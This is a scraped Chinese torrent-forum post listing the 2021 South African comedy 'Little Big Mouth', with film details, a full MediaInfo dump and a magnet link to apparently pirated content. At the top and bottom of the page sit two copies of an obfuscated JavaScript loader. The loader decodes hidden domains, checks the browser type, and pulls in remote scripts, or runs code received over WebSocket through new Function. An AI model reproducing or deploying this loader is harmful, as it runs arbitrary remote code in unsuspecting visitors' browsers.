人小嘴大[中文字幕].Little.Big.Mouth.2021.1080p.NF.WEB-DL.DDP5.1.x264 4.59GB

版主小s 1月前 185

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 人小嘴大 / Little Big Mouth

◎片 名 The Trouble with Siya

◎年 代 2021

◎产 地 南非

◎类 别 喜剧

◎语 言 英语

◎上映日期 2021-10-22(南非)

◎IMDb链接 https://www.imdb.com/title/tt14537540/

◎豆瓣链接 https://movie.douban.com/subject/35614316/

◎片 长 94分钟

◎简 介

被乐队和家人扫地出门后,玩世不恭的吉他手投靠一名会计及其儿子和父亲。他们能否共谱甜蜜乐章?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 324689833091321433059223832250380100196 (0xF444FCBA602B940DCC064655A6DAA264)

  4. Complete name : [email protected]OM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 4.59 GiB

  8. Duration : 1 h 34 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 6 937 kb/s

  11. Encoded date : UTC 2021-10-22 11:23:09

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 3 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 3 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 34 min

  24. Bit rate mode : Variable

  25. Bit rate : 3 730 kb/s

  26. Nominal bit rate : 4 020 kb/s

  27. Maximum bit rate : 6 030 kb/s

  28. Width : 1 920 pixels

  29. Height : 1 080 pixels

  30. Display aspect ratio : 16:9

  31. Frame rate mode : Constant

  32. Frame rate : 25.000 FPS

  33. Color space : YUV

  34. Chroma subsampling : 4:2:0

  35. Bit depth : 8 bits

  36. Scan type : Progressive

  37. Bits/(Pixel*Frame) : 0.072

  38. Stream size : 2.47 GiB (54%)

  39. Writing library : x264 core 148 r2724 dbe0335

  40. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=25 / scenecut=0 / intra_refresh=0 / rc_lookahead=50 / rc=2pass / mbtree=1 / bitrate=4020 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=6030 / vbv_bufsize=8040 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  41. Default : Yes

  42. Forced : No


  43. Audio #1

  44. ID : 2

  45. Format : E-AC-3

  46. Format/Info : Enhanced AC-3

  47. Commercial name : Dolby Digital Plus

  48. Codec ID : A_EAC3

  49. Duration : 1 h 34 min

  50. Bit rate mode : Constant

  51. Bit rate : 640 kb/s

  52. Channel(s) : 6 channels

  53. Channel layout : L R C LFE Ls Rs

  54. Sampling rate : 48.0 kHz

  55. Frame rate : 31.250 FPS (1536 SPF)

  56. Compression mode : Lossy

  57. Stream size : 433 MiB (9%)

  58. Title : English

  59. Language : English

  60. Service kind : Complete Main

  61. Default : Yes

  62. Forced : No


  63. Audio #2

  64. ID : 3

  65. Format : E-AC-3

  66. Format/Info : Enhanced AC-3

  67. Commercial name : Dolby Digital Plus

  68. Codec ID : A_EAC3

  69. Duration : 1 h 34 min

  70. Bit rate mode : Constant

  71. Bit rate : 640 kb/s

  72. Channel(s) : 6 channels

  73. Channel layout : L R C LFE Ls Rs

  74. Sampling rate : 48.0 kHz

  75. Frame rate : 31.250 FPS (1536 SPF)

  76. Compression mode : Lossy

  77. Stream size : 433 MiB (9%)

  78. Title : French

  79. Language : French

  80. Service kind : Complete Main

  81. Default : No

  82. Forced : No


  83. Audio #3

  84. ID : 4

  85. Format : E-AC-3

  86. Format/Info : Enhanced AC-3

  87. Commercial name : Dolby Digital Plus

  88. Codec ID : A_EAC3

  89. Duration : 1 h 34 min

  90. Bit rate mode : Constant

  91. Bit rate : 640 kb/s

  92. Channel(s) : 6 channels

  93. Channel layout : L R C LFE Ls Rs

  94. Sampling rate : 48.0 kHz

  95. Frame rate : 31.250 FPS (1536 SPF)

  96. Compression mode : Lossy

  97. Stream size : 433 MiB (9%)

  98. Title : Polish

  99. Language : Polish

  100. Service kind : Complete Main

  101. Default : No

  102. Forced : No


  103. Audio #4

  104. ID : 5

  105. Format : E-AC-3

  106. Format/Info : Enhanced AC-3

  107. Commercial name : Dolby Digital Plus

  108. Codec ID : A_EAC3

  109. Duration : 1 h 34 min

  110. Bit rate mode : Constant

  111. Bit rate : 640 kb/s

  112. Channel(s) : 6 channels

  113. Channel layout : L R C LFE Ls Rs

  114. Sampling rate : 48.0 kHz

  115. Frame rate : 31.250 FPS (1536 SPF)

  116. Compression mode : Lossy

  117. Stream size : 433 MiB (9%)

  118. Title : Brazilian Portuguese

  119. Language : Portuguese

  120. Service kind : Complete Main

  121. Default : No

  122. Forced : No


  123. Audio #5

  124. ID : 6

  125. Format : E-AC-3

  126. Format/Info : Enhanced AC-3

  127. Commercial name : Dolby Digital Plus

  128. Codec ID : A_EAC3

  129. Duration : 1 h 34 min

  130. Bit rate mode : Constant

  131. Bit rate : 640 kb/s

  132. Channel(s) : 6 channels

  133. Channel layout : L R C LFE Ls Rs

  134. Sampling rate : 48.0 kHz

  135. Frame rate : 31.250 FPS (1536 SPF)

  136. Compression mode : Lossy

  137. Stream size : 433 MiB (9%)

  138. Title : Spanish

  139. Language : Spanish

  140. Service kind : Complete Main

  141. Default : No

  142. Forced : No


  143. Text #1

  144. ID : 7

  145. Format : UTF-8

  146. Codec ID : S_TEXT/UTF8

  147. Codec ID/Info : UTF-8 Plain Text

  148. Duration : 1 h 34 min

  149. Bit rate : 94 b/s

  150. Count of elements : 1483

  151. Stream size : 65.4 KiB (0%)

  152. Title : English

  153. Language : English

  154. Default : Yes

  155. Forced : No


  156. Text #2

  157. ID : 8

  158. Format : UTF-8

  159. Codec ID : S_TEXT/UTF8

  160. Codec ID/Info : UTF-8 Plain Text

  161. Duration : 1 h 33 min

  162. Bit rate : 1 b/s

  163. Count of elements : 31

  164. Stream size : 1.23 KiB (0%)

  165. Title : English (Forced)

  166. Language : English

  167. Default : No

  168. Forced : Yes


  169. Text #3

  170. ID : 9

  171. Format : UTF-8

  172. Codec ID : S_TEXT/UTF8

  173. Codec ID/Info : UTF-8 Plain Text

  174. Duration : 1 h 34 min

  175. Bit rate : 82 b/s

  176. Count of elements : 1227

  177. Stream size : 57.2 KiB (0%)

  178. Title : Arabic

  179. Language : Arabic

  180. Default : No

  181. Forced : No


  182. Text #4

  183. ID : 10

  184. Format : UTF-8

  185. Codec ID : S_TEXT/UTF8

  186. Codec ID/Info : UTF-8 Plain Text

  187. Duration : 1 h 34 min

  188. Bit rate : 53 b/s

  189. Count of elements : 1238

  190. Stream size : 36.9 KiB (0%)

  191. Title : Chinese Simplified

  192. Language : Chinese

  193. Default : No

  194. Forced : No


  195. Text #5

  196. ID : 11

  197. Format : UTF-8

  198. Codec ID : S_TEXT/UTF8

  199. Codec ID/Info : UTF-8 Plain Text

  200. Duration : 1 h 34 min

  201. Bit rate : 56 b/s

  202. Count of elements : 1269

  203. Stream size : 38.7 KiB (0%)

  204. Title : Chinese Traditional

  205. Language : Chinese

  206. Default : No

  207. Forced : No


  208. Text #6

  209. ID : 12

  210. Format : UTF-8

  211. Codec ID : S_TEXT/UTF8

  212. Codec ID/Info : UTF-8 Plain Text

  213. Duration : 1 h 34 min

  214. Bit rate : 44 b/s

  215. Count of elements : 1236

  216. Stream size : 30.6 KiB (0%)

  217. Title : Croatian

  218. Language : Croatian

  219. Default : No

  220. Forced : No


  221. Text #7

  222. ID : 13

  223. Format : UTF-8

  224. Codec ID : S_TEXT/UTF8

  225. Codec ID/Info : UTF-8 Plain Text

  226. Duration : 1 h 34 min

  227. Bit rate : 54 b/s

  228. Count of elements : 1243

  229. Stream size : 37.3 KiB (0%)

  230. Title : Czech

  231. Language : Czech

  232. Default : No

  233. Forced : No


  234. Text #8

  235. ID : 14

  236. Format : UTF-8

  237. Codec ID : S_TEXT/UTF8

  238. Codec ID/Info : UTF-8 Plain Text

  239. Duration : 1 h 33 min

  240. Bit rate : 50 b/s

  241. Count of elements : 1219

  242. Stream size : 34.4 KiB (0%)

  243. Title : Danish

  244. Language : Danish

  245. Default : No

  246. Forced : No


  247. Text #9

  248. ID : 15

  249. Format : UTF-8

  250. Codec ID : S_TEXT/UTF8

  251. Codec ID/Info : UTF-8 Plain Text

  252. Duration : 1 h 34 min

  253. Bit rate : 50 b/s

  254. Count of elements : 1222

  255. Stream size : 35.0 KiB (0%)

  256. Title : Dutch

  257. Language : Dutch

  258. Default : No

  259. Forced : No


  260. Text #10

  261. ID : 16

  262. Format : UTF-8

  263. Codec ID : S_TEXT/UTF8

  264. Codec ID/Info : UTF-8 Plain Text

  265. Duration : 1 h 34 min

  266. Bit rate : 48 b/s

  267. Count of elements : 1222

  268. Stream size : 33.5 KiB (0%)

  269. Title : Finnish

  270. Language : Finnish

  271. Default : No

  272. Forced : No


  273. Text #11

  274. ID : 17

  275. Format : UTF-8

  276. Codec ID : S_TEXT/UTF8

  277. Codec ID/Info : UTF-8 Plain Text

  278. Duration : 1 h 34 min

  279. Bit rate : 50 b/s

  280. Count of elements : 1188

  281. Stream size : 34.7 KiB (0%)

  282. Title : French

  283. Language : French

  284. Default : No

  285. Forced : No


  286. Text #12

  287. ID : 18

  288. Format : UTF-8

  289. Codec ID : S_TEXT/UTF8

  290. Codec ID/Info : UTF-8 Plain Text

  291. Duration : 1 h 34 min

  292. Bit rate : 53 b/s

  293. Count of elements : 1168

  294. Stream size : 36.9 KiB (0%)

  295. Title : German

  296. Language : German

  297. Default : No

  298. Forced : No


  299. Text #13

  300. ID : 19

  301. Format : UTF-8

  302. Codec ID : S_TEXT/UTF8

  303. Codec ID/Info : UTF-8 Plain Text

  304. Duration : 1 h 34 min

  305. Bit rate : 78 b/s

  306. Count of elements : 1213

  307. Stream size : 54.1 KiB (0%)

  308. Title : Greek

  309. Language : Greek

  310. Default : No

  311. Forced : No


  312. Text #14

  313. ID : 20

  314. Format : UTF-8

  315. Codec ID : S_TEXT/UTF8

  316. Codec ID/Info : UTF-8 Plain Text

  317. Duration : 1 h 34 min

  318. Bit rate : 72 b/s

  319. Count of elements : 1223

  320. Stream size : 50.3 KiB (0%)

  321. Title : Hebrew

  322. Language : Hebrew

  323. Default : No

  324. Forced : No


  325. Text #15

  326. ID : 21

  327. Format : UTF-8

  328. Codec ID : S_TEXT/UTF8

  329. Codec ID/Info : UTF-8 Plain Text

  330. Duration : 1 h 34 min

  331. Bit rate : 52 b/s

  332. Count of elements : 1220

  333. Stream size : 36.4 KiB (0%)

  334. Title : Hungarian

  335. Language : Hungarian

  336. Default : No

  337. Forced : No


  338. Text #16

  339. ID : 22

  340. Format : UTF-8

  341. Codec ID : S_TEXT/UTF8

  342. Codec ID/Info : UTF-8 Plain Text

  343. Duration : 1 h 34 min

  344. Bit rate : 49 b/s

  345. Count of elements : 1222

  346. Stream size : 34.0 KiB (0%)

  347. Title : Indonesian

  348. Language : Indonesian

  349. Default : No

  350. Forced : No


  351. Text #17

  352. ID : 23

  353. Format : UTF-8

  354. Codec ID : S_TEXT/UTF8

  355. Codec ID/Info : UTF-8 Plain Text

  356. Duration : 1 h 34 min

  357. Bit rate : 53 b/s

  358. Count of elements : 1221

  359. Stream size : 36.8 KiB (0%)

  360. Title : Italian

  361. Language : Italian

  362. Default : No

  363. Forced : No


  364. Text #18

  365. ID : 24

  366. Format : UTF-8

  367. Codec ID : S_TEXT/UTF8

  368. Codec ID/Info : UTF-8 Plain Text

  369. Duration : 1 h 34 min

  370. Bit rate : 55 b/s

  371. Count of elements : 1342

  372. Stream size : 38.6 KiB (0%)

  373. Title : Japanese

  374. Language : Japanese

  375. Default : No

  376. Forced : No


  377. Text #19

  378. ID : 25

  379. Format : UTF-8

  380. Codec ID : S_TEXT/UTF8

  381. Codec ID/Info : UTF-8 Plain Text

  382. Duration : 1 h 34 min

  383. Bit rate : 66 b/s

  384. Count of elements : 1271

  385. Stream size : 45.5 KiB (0%)

  386. Title : Korean

  387. Language : Korean

  388. Default : No

  389. Forced : No


  390. Text #20

  391. ID : 26

  392. Format : UTF-8

  393. Codec ID : S_TEXT/UTF8

  394. Codec ID/Info : UTF-8 Plain Text

  395. Duration : 1 h 34 min

  396. Bit rate : 51 b/s

  397. Count of elements : 1230

  398. Stream size : 35.8 KiB (0%)

  399. Title : Malay

  400. Language : Malay

  401. Default : No

  402. Forced : No


  403. Text #21

  404. ID : 27

  405. Format : UTF-8

  406. Codec ID : S_TEXT/UTF8

  407. Codec ID/Info : UTF-8 Plain Text

  408. Duration : 1 h 33 min

  409. Bit rate : 50 b/s

  410. Count of elements : 1206

  411. Stream size : 34.4 KiB (0%)

  412. Title : Norwegian Bokmal

  413. Language : Norwegian Bokmal

  414. Default : No

  415. Forced : No


  416. Text #22

  417. ID : 28

  418. Format : UTF-8

  419. Codec ID : S_TEXT/UTF8

  420. Codec ID/Info : UTF-8 Plain Text

  421. Duration : 1 h 34 min

  422. Bit rate : 52 b/s

  423. Count of elements : 1218

  424. Stream size : 36.0 KiB (0%)

  425. Title : Polish

  426. Language : Polish

  427. Default : No

  428. Forced : No


  429. Text #23

  430. ID : 29

  431. Format : UTF-8

  432. Codec ID : S_TEXT/UTF8

  433. Codec ID/Info : UTF-8 Plain Text

  434. Duration : 1 h 34 min

  435. Bit rate : 51 b/s

  436. Count of elements : 1200

  437. Stream size : 35.7 KiB (0%)

  438. Title : Portuguese

  439. Language : Portuguese

  440. Default : No

  441. Forced : No


  442. Text #24

  443. ID : 30

  444. Format : UTF-8

  445. Codec ID : S_TEXT/UTF8

  446. Codec ID/Info : UTF-8 Plain Text

  447. Duration : 1 h 34 min

  448. Bit rate : 52 b/s

  449. Count of elements : 1187

  450. Stream size : 36.3 KiB (0%)

  451. Title : Brazilian Portuguese

  452. Language : Portuguese

  453. Default : No

  454. Forced : No


  455. Text #25

  456. ID : 31

  457. Format : UTF-8

  458. Codec ID : S_TEXT/UTF8

  459. Codec ID/Info : UTF-8 Plain Text

  460. Duration : 1 h 34 min

  461. Bit rate : 55 b/s

  462. Count of elements : 1210

  463. Stream size : 37.9 KiB (0%)

  464. Title : Romanian

  465. Language : Romanian

  466. Default : No

  467. Forced : No


  468. Text #26

  469. ID : 32

  470. Format : UTF-8

  471. Codec ID : S_TEXT/UTF8

  472. Codec ID/Info : UTF-8 Plain Text

  473. Duration : 1 h 34 min

  474. Bit rate : 81 b/s

  475. Count of elements : 1220

  476. Stream size : 55.9 KiB (0%)

  477. Title : Russian

  478. Language : Russian

  479. Default : No

  480. Forced : No


  481. Text #27

  482. ID : 33

  483. Format : UTF-8

  484. Codec ID : S_TEXT/UTF8

  485. Codec ID/Info : UTF-8 Plain Text

  486. Duration : 1 h 34 min

  487. Bit rate : 48 b/s

  488. Count of elements : 1205

  489. Stream size : 33.6 KiB (0%)

  490. Title : Spanish

  491. Language : Spanish

  492. Default : No

  493. Forced : No


  494. Text #28

  495. ID : 34

  496. Format : UTF-8

  497. Codec ID : S_TEXT/UTF8

  498. Codec ID/Info : UTF-8 Plain Text

  499. Duration : 1 h 34 min

  500. Bit rate : 53 b/s

  501. Count of elements : 1253

  502. Stream size : 36.9 KiB (0%)

  503. Title : European Spanish

  504. Language : Spanish

  505. Default : No

  506. Forced : No


  507. Text #29

  508. ID : 35

  509. Format : UTF-8

  510. Codec ID : S_TEXT/UTF8

  511. Codec ID/Info : UTF-8 Plain Text

  512. Duration : 1 h 34 min

  513. Bit rate : 53 b/s

  514. Count of elements : 1258

  515. Stream size : 36.9 KiB (0%)

  516. Title : Swedish

  517. Language : Swedish

  518. Default : No

  519. Forced : No


  520. Text #30

  521. ID : 36

  522. Format : UTF-8

  523. Codec ID : S_TEXT/UTF8

  524. Codec ID/Info : UTF-8 Plain Text

  525. Duration : 1 h 34 min

  526. Bit rate : 130 b/s

  527. Count of elements : 1227

  528. Stream size : 90.0 KiB (0%)

  529. Title : Thai

  530. Language : Thai

  531. Default : No

  532. Forced : No


  533. Text #31

  534. ID : 37

  535. Format : UTF-8

  536. Codec ID : S_TEXT/UTF8

  537. Codec ID/Info : UTF-8 Plain Text

  538. Duration : 1 h 33 min

  539. Bit rate : 50 b/s

  540. Count of elements : 1206

  541. Stream size : 34.9 KiB (0%)

  542. Title : Turkish

  543. Language : Turkish

  544. Default : No

  545. Forced : No


  546. Text #32

  547. ID : 38

  548. Format : UTF-8

  549. Codec ID : S_TEXT/UTF8

  550. Codec ID/Info : UTF-8 Plain Text

  551. Duration : 1 h 34 min

  552. Bit rate : 79 b/s

  553. Count of elements : 1271

  554. Stream size : 55.0 KiB (0%)

  555. Title : Ukrainian

  556. Language : Ukrainian

  557. Default : No

  558. Forced : No


  559. Text #33

  560. ID : 39

  561. Format : UTF-8

  562. Codec ID : S_TEXT/UTF8

  563. Codec ID/Info : UTF-8 Plain Text

  564. Duration : 1 h 34 min

  565. Bit rate : 73 b/s

  566. Count of elements : 1220

  567. Stream size : 50.9 KiB (0%)

  568. Title : Vietnamese

  569. Language : Vietnamese

  570. Default : No

  571. Forced : No




复制代码


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:A3230FF836048CC2BC95A546E928318025B754EB

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};